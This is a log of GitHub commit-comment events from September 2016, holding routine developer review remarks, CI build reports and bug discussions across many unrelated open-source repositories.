{"id":"4534676935","type":"CommitCommentEvent","actor":{"login":"klarkc"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18946519,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T15:13:17Z","updated_at":"2016-09-08T15:13:17Z","body":"@Nigeltiany look for the code in that line, maybe this information can help us. In my bundle.js there is not a readFileSync call in the line 19829"}},"created_at":"2016-09-08T15:13:17Z"}
{"id":"4534677914","type":"CommitCommentEvent","actor":{"login":"kobboi"},"repo":{"name":"GNOME/gnome-calendar"},"payload":{"comment":{"id":18946526,"position":null,"line":null,"path":null,"commit_id":"3340f587d9da1ffc780e56b45097aa9773447db6","created_at":"2016-09-08T15:13:25Z","updated_at":"2016-09-08T15:13:25Z","body":"Since 3.20.3 (built from source), I seem to have the issue you describe, which is strange, as I can see the line that should fix it in the tarball. Version 3.20.2 was fine by the way, so I'm experiencing the opposite of you. (As an aside, why doesn't gnome-calendar use the locale settings? I have LC_TIME=en_GB.UTF-8, set via GNOME Settings)"}},"created_at":"2016-09-08T15:13:25Z"}
{"id":"4534679815","type":"CommitCommentEvent","actor":{"login":"cossacksman"},"repo":{"name":"cossacksman/node-adwords"},"payload":{"comment":{"id":18946533,"position":null,"line":null,"path":null,"commit_id":"b81d6fba672431921c99519d7d7c177d18b76a46","created_at":"2016-09-08T15:13:42Z","updated_at":"2016-09-08T15:13:42Z","body":"This may not have happened to anybody else but this is the only way I could get Google to accept my request; it was looking for a 'scope' parameter, not a 'scopes'."}},"created_at":"2016-09-08T15:13:42Z"}
{"id":"4534680402","type":"CommitCommentEvent","actor":{"login":"fzumstein"},"repo":{"name":"ZoomerAnalytics/xlwings"},"payload":{"comment":{"id":18946534,"position":4,"line":15,"path":"setup.py","commit_id":"8b17b68413cbded399601b7db30e23ef59d9a4c1","created_at":"2016-09-08T15:13:47Z","updated_at":"2016-09-08T15:13:47Z","body":"I tried it once and didn't get anywhere. Happy to help you if you want to try it out and also happy to accept a PR if you are successful! I think the issue is that you need to run python + pywin32 unter wine, too. Also getting the latest versions of office up and running I think is not trivial neither. I decided that if supporting linux, it would make more sense to support Open/Libre Office."}},"created_at":"2016-09-08T15:13:47Z"}
{"id":"4534680448","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"fluidic/beaver"},"payload":{"comment":{"id":18946535,"position":9,"line":26,"path":"beaver_trigger_handler/lib/src/task_instance_runner.dart","commit_id":"7bf0f13f1db55d97c1dd374b6ded9ea9a2dd36fc","created_at":"2016-09-08T15:13:48Z","updated_at":"2016-09-08T15:13:48Z","body":"맵 관련 에러 확인해보니 직접적인 원인으로는\r\n\r\n여기서 config의 타입이 Map이고 밑에서 runBeaver로 넘겨줍니다.\r\nrunBeaver는 Map의 파생타입인 Config로 받고 있습니다.\r\n\r\n수정 방향 잡기엔 Config 관련 내용을 좀 더 봐야할 듯 해서 우선 코멘트로 남겨둡니다"}},"created_at":"2016-09-08T15:13:48Z"}
{"id":"4534682386","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18946546,"position":null,"line":null,"path":null,"commit_id":"78259593a08355bbb9495d521e107a75bf146de2","created_at":"2016-09-08T15:14:07Z","updated_at":"2016-09-08T15:14:07Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XfETHkWLQRSz79imEgSuCQ"}},"created_at":"2016-09-08T15:14:07Z"}
{"id":"4534684940","type":"CommitCommentEvent","actor":{"login":"JeremyRubin"},"repo":{"name":"JeremyRubin/bitcoin"},"payload":{"comment":{"id":18946553,"position":null,"line":null,"path":null,"commit_id":"0c9d659acd4979db847f44a934060d0b29257ac9","created_at":"2016-09-08T15:14:30Z","updated_at":"2016-09-08T15:14:30Z","body":"There's no reason for the emplacer in this commit other than to change the API to be more consistent intermittently with the final version. In a later commit (which I think you saw) this is made into the more efficient version."}},"created_at":"2016-09-08T15:14:30Z"}
{"id":"4534686666","type":"CommitCommentEvent","actor":{"login":"oli-g"},"repo":{"name":"anryko/grafana-influx-dashboard"},"payload":{"comment":{"id":18946558,"position":166,"line":805,"path":"getdash.conf.js","commit_id":"d55d98ced609e1eb4e948390102528fdd15f8d9d","created_at":"2016-09-08T15:14:45Z","updated_at":"2016-09-08T15:14:45Z","body":"I would set the color here too."}},"created_at":"2016-09-08T15:14:45Z"}
{"id":"4534695217","type":"CommitCommentEvent","actor":{"login":"jplitza"},"repo":{"name":"ffnord/ffnord-alfred-announce"},"payload":{"comment":{"id":18946588,"position":null,"line":null,"path":null,"commit_id":"f8c2aa5df00e13e6fa03e4c0e63b22ecab41740e","created_at":"2016-09-08T15:16:00Z","updated_at":"2016-09-08T15:16:00Z","body":"You may have good reason to do ignore it there and have it here, but please note that uptime is a frequently changing value and thus already present in `statistics.d`."}},"created_at":"2016-09-08T15:16:00Z"}
{"id":"4534695798","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18946594,"position":null,"line":null,"path":null,"commit_id":"5200dc4dbe29783cbc55400692d3f395506621b3","created_at":"2016-09-08T15:16:07Z","updated_at":"2016-09-08T15:16:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 973](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12979&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:10:02"}},"created_at":"2016-09-08T15:16:07Z"}
{"id":"4534702339","type":"CommitCommentEvent","actor":{"login":"billyfournier"},"repo":{"name":"CodingDojoDallas/mean-sept-2016"},"payload":{"comment":{"id":18946609,"position":null,"line":null,"path":null,"commit_id":"583df3f1a67eada5c2356867b9962c706b135eeb","created_at":"2016-09-08T15:17:07Z","updated_at":"2016-09-08T15:17:07Z","body":"Should probably put this into a user folder."}},"created_at":"2016-09-08T15:17:07Z"}
{"id":"4534703896","type":"CommitCommentEvent","actor":{"login":"Pekushka"},"repo":{"name":"Pekushka/pshmyrep"},"payload":{"comment":{"id":18946612,"position":null,"line":null,"path":null,"commit_id":"d7fd9ecb480dcb57aafc217f290ddc746fba0fc7","created_at":"2016-09-08T15:17:21Z","updated_at":"2016-09-08T15:17:21Z","body":"1"}},"created_at":"2016-09-08T15:17:21Z"}
{"id":"4534704304","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18946614,"position":null,"line":null,"path":null,"commit_id":"2249107906461ca050fa1e815361dac698817014","created_at":"2016-09-08T15:17:25Z","updated_at":"2016-09-08T15:17:25Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5s1EsVvH&#x2F;5-revoir-la-requete-permettant-de-connaitre-la-table-root\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Revoir la requête permettant de connaitre la table &quot;root&quot;</a>"}},"created_at":"2016-09-08T15:17:25Z"}
{"id":"4534704326","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18946615,"position":null,"line":null,"path":null,"commit_id":"2249107906461ca050fa1e815361dac698817014","created_at":"2016-09-08T15:17:25Z","updated_at":"2016-09-08T15:17:25Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5s1EsVvH&#x2F;5-revoir-la-requete-permettant-de-connaitre-la-table-root\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Revoir la requête permettant de connaitre la table &quot;root&quot;</a>"}},"created_at":"2016-09-08T15:17:25Z"}
{"id":"4534709157","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18946635,"position":null,"line":null,"path":null,"commit_id":"9ded3d102588c977142e00842b1232ce06ca6aa8","created_at":"2016-09-08T15:18:07Z","updated_at":"2016-09-08T15:18:07Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.762.9ded3d102588c977142e00842b1232ce06ca6aa8](http://build.palaso.org/viewLog.html?buildId=76617&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:05:45"}},"created_at":"2016-09-08T15:18:07Z"}
{"id":"4534711340","type":"CommitCommentEvent","actor":{"login":"faergeek"},"repo":{"name":"whitescape/react-admin-components"},"payload":{"comment":{"id":18946637,"position":32,"line":69,"path":"src/ui/form/MarkdownEditor/Toolbar.js","commit_id":"fa99127c7ede3a76492f3b1732287565ed105617","created_at":"2016-09-08T15:18:27Z","updated_at":"2016-09-08T15:18:27Z","body":"забыл `footnote` из пропсов взять. Интересно куда ушла ошибка сборки трэвиса...)"}},"created_at":"2016-09-08T15:18:27Z"}
{"id":"4534711502","type":"CommitCommentEvent","actor":{"login":"Nigeltiany"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18946639,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T15:18:29Z","updated_at":"2016-09-08T15:18:29Z","body":"I think it is a really dynamic file that's project dependent. here is mine \r\n![fserror](https://cloud.githubusercontent.com/assets/8957192/18355057/f00ecc94-75b5-11e6-8d72-6361907d3f9c.png)\r\n![fsaddrerror](https://cloud.githubusercontent.com/assets/8957192/18355066/f3f5731c-75b5-11e6-9ce6-42e2ee9de49d.png)\r\n\r\n"}},"created_at":"2016-09-08T15:18:29Z"}
{"id":"4534713076","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18946641,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T15:18:42Z","updated_at":"2016-09-08T15:18:42Z","body":"That's the briefly considered part."}},"created_at":"2016-09-08T15:18:42Z"}
{"id":"4534713739","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18946644,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T15:18:48Z","updated_at":"2016-09-08T15:18:48Z","body":"Here it is http://www.mediafire.com/download/5lcty5q2gp5t8a6/aosp-7.0-vivalto3gvn.zip."}},"created_at":"2016-09-08T15:18:48Z"}
{"id":"4534714811","type":"CommitCommentEvent","actor":{"login":"chellm82"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18946649,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-08T15:18:59Z","updated_at":"2016-09-08T15:18:59Z","body":"thx"}},"created_at":"2016-09-08T15:18:59Z"}
{"id":"4534715792","type":"CommitCommentEvent","actor":{"login":"codeservice"},"repo":{"name":"HaxeFoundation/hxcpp"},"payload":{"comment":{"id":18946651,"position":null,"line":null,"path":null,"commit_id":"743d83cf76f56d1a0bae7e898cbf0ee8a455dd26","created_at":"2016-09-08T15:19:08Z","updated_at":"2016-09-08T15:19:08Z","body":"Same for me I am using no_recurse. I had problems on Mac when I run ereg in\nthread pcre crash when found block longer then 1000 byte. The same problem\non neko.\n\nOn Thu, Sep 8, 2016 at 11:05 AM, Joshua Granick <notifications@github.com>\nwrote:\n\n> I just experienced a project where EReg crashes unless PCRE has\n> -DNO_RECURSE\n>\n> I don't know if it would be better to use NO_RECURSE on all platforms for\n> consistency (and crash safety), though Windows appears to be more\n> susceptible in testing (and based on the comments in the PCRE source\n> regarding the define)\n>\n> I understand this has performance implications (maybe 15-20%) so I wanted\n> to mention this\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/HaxeFoundation/hxcpp/commit/743d83cf76f56d1a0bae7e898cbf0ee8a455dd26#commitcomment-18946392>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABsIG4q30wxzXq_ZRiCSK9eVEJKtRtGhks5qoCRRgaJpZM4J4GZD>\n> .\n>\n"}},"created_at":"2016-09-08T15:19:08Z"}
{"id":"4534716151","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946652,"position":8,"line":18,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:19:12Z","updated_at":"2016-09-08T15:19:12Z","body":"Yes. The reason is that I wanted to name the construction which takes such a relation and turns it into an actual group `subgroup`. But we could also do it the other way around: call this `subgroup` and call that construction `Group_subgroup` or something."}},"created_at":"2016-09-08T15:19:12Z"}
{"id":"4534720505","type":"CommitCommentEvent","actor":{"login":"atrookey"},"repo":{"name":"sxenos/eclipse.jdt.core"},"payload":{"comment":{"id":18946661,"position":null,"line":null,"path":null,"commit_id":"23eeb2bbb8489eadb75ab2ae0c6ff7c738868b14","created_at":"2016-09-08T15:19:49Z","updated_at":"2016-09-08T15:19:49Z","body":"lgtm"}},"created_at":"2016-09-08T15:19:49Z"}
{"id":"4534721495","type":"CommitCommentEvent","actor":{"login":"evgeny-sav"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18946663,"position":null,"line":null,"path":null,"commit_id":"041217abd13e2accf89f083db8f0c6b8b1158d3f","created_at":"2016-09-08T15:19:58Z","updated_at":"2016-09-08T15:19:58Z","body":"viewed"}},"created_at":"2016-09-08T15:19:58Z"}
{"id":"4534725343","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18946679,"position":null,"line":null,"path":null,"commit_id":"64ac2b44f1b3a37cefdd35b50ce8a9127792a7c6","created_at":"2016-09-08T15:20:33Z","updated_at":"2016-09-08T15:20:33Z","body":"I specifically recall adding these files in the past. I'm not sure where, exactly, the changes went to. Testing under Visual Studio did not reveal any problems before the merge; but there surely would have been problems after the merge."}},"created_at":"2016-09-08T15:20:33Z"}
{"id":"4534727600","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18946682,"position":null,"line":null,"path":null,"commit_id":"c8e787f77188e2cdf0335716d31251f9ac0c5373","created_at":"2016-09-08T15:20:53Z","updated_at":"2016-09-08T15:20:53Z","body":"I specifically recall adding these files in the past. I'm not sure where, exactly, the changes went to. Testing under Visual Studio did not reveal any problems before the merge; but there surely would have been problems after the merge."}},"created_at":"2016-09-08T15:20:53Z"}
{"id":"4534728983","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18946684,"position":null,"line":null,"path":null,"commit_id":"7088e29a297de67d8a501bc62e3faf25036710ad","created_at":"2016-09-08T15:21:05Z","updated_at":"2016-09-08T15:21:05Z","body":"@pelikhan I'm just thinking, this is more of a comment than an (unique) id. Maybe we should use `{l10n:...}` or `{loc:...}` ? Maybe it doesn't matter though... CC #320 "}},"created_at":"2016-09-08T15:21:05Z"}
{"id":"4534729860","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18946685,"position":null,"line":null,"path":null,"commit_id":"a059f39ec93580bec5243f9adae4b9a753b61ae3","created_at":"2016-09-08T15:21:13Z","updated_at":"2016-09-08T15:21:13Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/19/violations\n```\nplone/app/drafts/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T15:21:13Z"}
{"id":"4534730322","type":"CommitCommentEvent","actor":{"login":"krisselden"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18946687,"position":50,"line":8,"path":"packages/ember-glimmer/lib/template.js","commit_id":"237c04c62526e7ba506dad16413cb54d06882d58","created_at":"2016-09-08T15:21:16Z","updated_at":"2016-09-08T15:21:16Z","body":"please add meta here, `meta: factory.meta` or return the factory but override its create"}},"created_at":"2016-09-08T15:21:16Z"}
{"id":"4534731105","type":"CommitCommentEvent","actor":{"login":"myobie"},"repo":{"name":"yoshuawuyts/choo"},"payload":{"comment":{"id":18946692,"position":null,"line":null,"path":null,"commit_id":"f32ef741de35391930011087431740754b47f268","created_at":"2016-09-08T15:21:23Z","updated_at":"2016-09-08T15:21:23Z","body":"Danke. I am going to work the new wrappers into my app this week. 👍 "}},"created_at":"2016-09-08T15:21:23Z"}
{"id":"4534733233","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18946695,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T15:21:43Z","updated_at":"2016-09-08T15:21:43Z","body":"I suppose it should be possible to access it from the lexer. In fact, I see it's already used there."}},"created_at":"2016-09-08T15:21:43Z"}
{"id":"4534735858","type":"CommitCommentEvent","actor":{"login":"oli-g"},"repo":{"name":"anryko/grafana-influx-dashboard"},"payload":{"comment":{"id":18946702,"position":209,"line":848,"path":"getdash.conf.js","commit_id":"d55d98ced609e1eb4e948390102528fdd15f8d9d","created_at":"2016-09-08T15:22:07Z","updated_at":"2016-09-08T15:22:07Z","body":"Same here for the color."}},"created_at":"2016-09-08T15:22:07Z"}
{"id":"4534738401","type":"CommitCommentEvent","actor":{"login":"Volind"},"repo":{"name":"rowen92/cv"},"payload":{"comment":{"id":18946706,"position":21,"line":17,"path":"views/index.html","commit_id":"aee60a089ae5bee5ededb14434d8cccc5fe0959a","created_at":"2016-09-08T15:22:28Z","updated_at":"2016-09-08T15:22:28Z","body":"Where is this class described in styles? And what does it do? If only purpose is to make text bold, then why you are using strong tag?"}},"created_at":"2016-09-08T15:22:28Z"}
{"id":"4534738417","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18946707,"position":20,"line":157,"path":"starter.js","commit_id":"f9695e768ca1f60631e7835cc70f89fa0cc399cd","created_at":"2016-09-08T15:22:28Z","updated_at":"2016-09-08T15:22:28Z","body":"Oh. Je pensais qu'on remplacerait juste `content<` par `stylesheet<`.\r\nParce que organisé comme ça, certes on voit bien où est la feuille de style, mais on complique la structure...\r\nÇa pourrait être utile si on voulait créer plusieurs sous-champs..."}},"created_at":"2016-09-08T15:22:28Z"}
{"id":"4534739754","type":"CommitCommentEvent","actor":{"login":"gido"},"repo":{"name":"paularmstrong/swig"},"payload":{"comment":{"id":18946711,"position":null,"line":null,"path":null,"commit_id":"70a1c8899266893ff22354c2426329e306c2f322","created_at":"2016-09-08T15:22:39Z","updated_at":"2016-09-08T15:22:39Z","body":"Yes would be nice to re-enable issue tracker. It's the best way to find a new maintainer.\r\nWhat do you think @paularmstrong ?"}},"created_at":"2016-09-08T15:22:39Z"}
{"id":"4534741477","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18946716,"position":null,"line":null,"path":null,"commit_id":"2d0d971e001cb2edf40c24acfbc99682fd6f7493","created_at":"2016-09-08T15:22:53Z","updated_at":"2016-09-08T15:22:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 974](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12984&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T15:22:53Z"}
{"id":"4534741883","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946718,"position":32,"line":42,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:22:57Z","updated_at":"2016-09-08T15:22:57Z","body":"One possibility is to use term mode for the part which determines the universe level of the thing you're constructing:\r\nin this definition we could do something like\r\n```lean\r\nsubgroup_rel.mk \r\n  (fun h, ttrunc (fiber f h) \r\n  begin end \r\n  begin end \r\n  begin end\r\n```"}},"created_at":"2016-09-08T15:22:57Z"}
{"id":"4534743198","type":"CommitCommentEvent","actor":{"login":"abdallhikal"},"repo":{"name":"abdallhikal/recipes"},"payload":{"comment":{"id":18946722,"position":2,"line":1,"path":"cake-recipe.txt","commit_id":"d0acaa35b6766c3d94699c50f75add1b537f1784","created_at":"2016-09-08T15:23:10Z","updated_at":"2016-09-08T15:23:10Z","body":"شيل "}},"created_at":"2016-09-08T15:23:10Z"}
{"id":"4534743342","type":"CommitCommentEvent","actor":{"login":"krisselden"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18946724,"position":9,"line":11,"path":"packages/ember-template-compiler/lib/system/compile-options.js","commit_id":"237c04c62526e7ba506dad16413cb54d06882d58","created_at":"2016-09-08T15:23:11Z","updated_at":"2016-09-08T15:23:11Z","body":"don't need the `|| {}` because you assign it above"}},"created_at":"2016-09-08T15:23:11Z"}
{"id":"4534746750","type":"CommitCommentEvent","actor":{"login":"elPartizan"},"repo":{"name":"sapegin/social-likes-next"},"payload":{"comment":{"id":18946737,"position":null,"line":null,"path":null,"commit_id":"f280365dfa33c820f2ff0a1a1c943e7e35b456a6","created_at":"2016-09-08T15:23:39Z","updated_at":"2016-09-08T15:23:39Z","body":"Привет! Не работают счетчики Facebook :("}},"created_at":"2016-09-08T15:23:39Z"}
{"id":"4534748372","type":"CommitCommentEvent","actor":{"login":"bestdimka"},"repo":{"name":"bestdimka/hello-word"},"payload":{"comment":{"id":18946740,"position":null,"line":null,"path":null,"commit_id":"0e3fc39c50b8e8c0f9b218caa4c275237027d44f","created_at":"2016-09-08T15:23:54Z","updated_at":"2016-09-08T15:23:54Z","body":"123"}},"created_at":"2016-09-08T15:23:54Z"}
{"id":"4534749436","type":"CommitCommentEvent","actor":{"login":"rich-reactor8"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":18946745,"position":6,"line":41,"path":"application/model/module_refs/tree.rb","commit_id":"6c08c3330bd34650c0c5594eedc9fa6a00fe3ecf","created_at":"2016-09-08T15:24:04Z","updated_at":"2016-09-08T15:24:04Z","body":"What is the scenario(s) under which there is no matching assembly branch?"}},"created_at":"2016-09-08T15:24:04Z"}
{"id":"4534752508","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18946751,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T15:24:31Z","updated_at":"2016-09-08T15:24:31Z","body":"UPD:\r\n\r\nВыяснил, что `@full_route` отдает `nil`, это странно, т.к. в test.rb я добавил\r\n\r\n```ruby\r\nroute_1 = Route.new(@station_1, @station_2)\r\n```\r\n\r\nИ в консоли\r\n\r\n```\r\ntest.rb(main):007:0> @route_1 = Route.new(@station_1, @station_2)\r\n=> #<Route:0x007fe98c1bbac0 @full_route=[#<Station:0x007fe98c1112a0 @name=\"first_station\", @trains_on_station=[]>, #<Station:0x007fe98c19af50 @name=\"last_station\", @trains_on_station=[]>]>\r\n```"}},"created_at":"2016-09-08T15:24:31Z"}
{"id":"4534753374","type":"CommitCommentEvent","actor":{"login":"MaheshPesani"},"repo":{"name":"neudesic-digi-plat/neumint-docker"},"payload":{"comment":{"id":18946753,"position":null,"line":null,"path":null,"commit_id":"5f550581f31577140c966b22b4c6694c7873b5cb","created_at":"2016-09-08T15:24:39Z","updated_at":"2016-09-08T15:24:39Z","body":"Thank you Chad.\r\n\r\nWe are not going to keep the current general code layout and planning to follow below structure to organize the code. Please review and advise.\r\n\r\nindex.html\r\napp\r\n|\r\n|____components\r\n|      |\r\n|      |____dashboard\r\n|      |\r\n|      |____expenses\r\n|      |\r\n|      |____models\r\n|      |\r\n|      |____shared\r\n|\r\n|____services\r\n|\r\n|____*app.component.ts*\r\n|\r\n|____*app.module.ts*\r\n|\r\n|____*app.routing.ts*\r\n|\r\n|____*main.ts*\r\n|\r\nassets\r\n|\r\n|____images\r\n| \r\n|____styles\r\n"}},"created_at":"2016-09-08T15:24:39Z"}
{"id":"4534754439","type":"CommitCommentEvent","actor":{"login":"Rojasmar1966"},"repo":{"name":"Rojasmar1966/testinggit"},"payload":{"comment":{"id":18946755,"position":null,"line":null,"path":null,"commit_id":"06516a8650314fe990a3237399ff46fe8e03d61b","created_at":"2016-09-08T15:24:48Z","updated_at":"2016-09-08T15:24:48Z","body":"Todo bien \n"}},"created_at":"2016-09-08T15:24:48Z"}
{"id":"4534756793","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18946758,"position":null,"line":null,"path":null,"commit_id":"92e63952bf50d1b6228c12141ae17f7cf820bba5","created_at":"2016-09-08T15:25:11Z","updated_at":"2016-09-08T15:25:11Z","body":"I forgot the #4 "}},"created_at":"2016-09-08T15:25:11Z"}
{"id":"4534760381","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946764,"position":47,"line":67,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:25:39Z","updated_at":"2016-09-08T15:25:39Z","body":"Then feel free to define it yourself. Or use `is_equiv f` in the definition below, since that is the same for homomorphisms."}},"created_at":"2016-09-08T15:25:39Z"}
{"id":"4534760741","type":"CommitCommentEvent","actor":{"login":"krisselden"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18946765,"position":33,"line":37,"path":"packages/ember-template-compiler/lib/system/compile.js","commit_id":"237c04c62526e7ba506dad16413cb54d06882d58","created_at":"2016-09-08T15:25:42Z","updated_at":"2016-09-08T15:25:42Z","body":"compileOptions is done inside of precompile, just move it local to precompile."}},"created_at":"2016-09-08T15:25:42Z"}
{"id":"4534763641","type":"CommitCommentEvent","actor":{"login":"niel"},"repo":{"name":"nZEDb/nZEDb"},"payload":{"comment":{"id":18946770,"position":null,"line":null,"path":null,"commit_id":"9c78f507b762759ed512cbe2d52332fea0a57438","created_at":"2016-09-08T15:26:08Z","updated_at":"2016-09-08T15:26:08Z","body":"That command would only create from the stable (i,e, release) branch. New release hasn't been created yet. I will be doing it shortly."}},"created_at":"2016-09-08T15:26:08Z"}
{"id":"4534764086","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946771,"position":59,"line":79,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:26:12Z","updated_at":"2016-09-08T15:26:12Z","body":"I was wrong, `isomorphism.trans` is defined here:\r\nhttps://github.com/leanprover/lean/blob/master/hott/algebra/group_theory.hlean#L174"}},"created_at":"2016-09-08T15:26:12Z"}
{"id":"4534765595","type":"CommitCommentEvent","actor":{"login":"mshievitz"},"repo":{"name":"dewhisna/Repetier-Firmware"},"payload":{"comment":{"id":18946776,"position":null,"line":null,"path":null,"commit_id":"20fea79dbf4863c0f38f6c9ed1f76682bb9cfb5e","created_at":"2016-09-08T15:26:26Z","updated_at":"2016-09-08T15:26:26Z","body":"stepperWait' referenced in section `.text' of /var/folders/rk/t7d7fjsj0jgclgdjhp1tb5yc0000gn/T//ccKaMWxA.ltrans12.ltrans.o: defined in discarded section `.text' of sketch/HAL.cpp.o (symbol from plugin)\r\ncollect2: error: ld returned 1 exit status\r\nexit status 1\r\nError compiling for board Arduino/Genuino Mega or Mega 2560.\r\ngetting the above error. any ideas?\r\njust trying to get BoXZY up with the display. will also add the lights later. i only have the Laser and Milling heads at the moment"}},"created_at":"2016-09-08T15:26:26Z"}
{"id":"4534766368","type":"CommitCommentEvent","actor":{"login":"miamarti"},"repo":{"name":"maruilian11/cdnjs"},"payload":{"comment":{"id":18946777,"position":null,"line":null,"path":null,"commit_id":"9294c104dcf28e746fba259a71363c25f7ec1168","created_at":"2016-09-08T15:26:32Z","updated_at":"2016-09-08T15:26:32Z","body":"Thank you @maruilian11 :smile: "}},"created_at":"2016-09-08T15:26:32Z"}
{"id":"4534767332","type":"CommitCommentEvent","actor":{"login":"pferraro"},"repo":{"name":"infinispan/infinispan"},"payload":{"comment":{"id":18946779,"position":35,"line":35,"path":"client/hotrod-client/src/main/java/org/infinispan/client/hotrod/RemoteCacheContainer.java","commit_id":"0a00492b220f357dce324b31d6c2506d8855a44b","created_at":"2016-09-08T15:26:40Z","updated_at":"2016-09-08T15:26:40Z","body":"Why would a new interface have any deprecated methods?"}},"created_at":"2016-09-08T15:26:40Z"}
